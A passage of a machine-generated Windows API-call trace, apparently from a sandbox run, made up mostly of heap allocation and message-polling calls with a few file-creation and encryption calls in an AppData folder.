dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0200.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0200.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0200.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0200.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0200.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0200.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0200.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0200.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0200.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0200.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0200.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0200.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0200.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0200.784] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.784] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.784] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.784] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0200.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.785] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Macromedia" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.785] GetLastError () returned 0x5 [0200.785] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.785] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.785] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0200.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0200.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.785] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.Macromedia" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.macromedia"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0200.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0200.786] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0200.786] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.786] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0200.787] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0200.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0200.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.787] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0200.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0200.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0200.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.787] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0200.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0200.787] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0200.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0200.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0200.788] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0200.788] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.788] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0200.788] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.788] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0200.788] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0200.788] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0200.789] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0200.789] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0200.790] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0200.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0200.790] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0200.790] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.790] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0200.790] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.790] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0200.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0200.790] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.791] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.791] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.791] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.791] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.791] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.791] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0200.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0200.793] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0200.793] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.794] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0200.794] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.794] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.794] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.794] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.794] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0200.794] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0200.795] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.795] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0200.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0200.795] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.795] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.795] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.798] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.798] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.798] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0200.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0200.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0200.798] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0200.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0200.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0200.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0200.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0200.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0200.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0200.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0200.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0200.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0200.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0200.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0200.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0200.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0200.799] RtlAllocateHeap 